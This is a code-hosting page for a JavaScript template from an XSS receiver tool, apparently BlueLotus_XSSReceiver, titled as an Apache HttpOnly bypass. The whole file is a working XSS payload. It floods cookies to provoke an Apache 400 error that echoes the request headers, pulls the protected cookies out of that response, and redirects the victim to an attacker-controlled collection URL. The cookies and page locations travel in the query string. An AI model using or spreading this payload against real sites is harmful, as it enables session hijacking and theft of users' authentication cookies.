firesunCN/BlueLotus_XSSReceiver
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
BlueLotus_XSSReceiver/template/apache_httponly_bypass.js
firesun 264460650b Version 3.0.0 
1. 完成js模板,我的js模块,可以直接添加修改用于xss的js
2. 采用ace编辑器实现js代码高亮与错误检测
3. 使用js_beautify实现js代码格式化,使用jsmin实现js代码压缩
4. 整合xss'or工具部分功能,自由编码,方便生成最终的payload
5. 增加加密方式RC4,更改默认加密方式为RC4
6. 从旧版本升级并想保留记录的请务必查看Readme里的升级步骤
7. 修复一系列bug
2016-01-24 01:07:17 +08:00

36 lines
1.3 KiB
JavaScript
Raw Permalink Blame History

var website="http://网站地址";
function setCookies() {
/*apache server limit 8192*/
var str = "";
for (var i = 0; i < 819; i++) {
str += "x";
}
for (i = 0; i < 10; i++) {
var cookie = "ray" + i + "=" + str + ";path=/";
document.cookie = cookie;
}
}
function parseCookies() {
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
content = content[1].replace("Cookie: ", "");
cookies = content.replace(/ray\d=x+;?/g, '')
try {
var myopener = '';
myopener = window.parent.openner.location;
var myparent = '';
myparent = window.parent.location;
} catch (err) {
myopener = '0';
myparent = '0';
}
window.location = website + '/index.php?location=' + escape(document.location) + '&toplocation=' + escape(myparent) + '&cookie=' + escape(cookies) + '&opener=' + escape(myopener);
}
}
setCookies();
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("POST", "/?" + Math.random(), true);
xhr.send(null);
Reference in New Issue View Git Blame Copy Permalink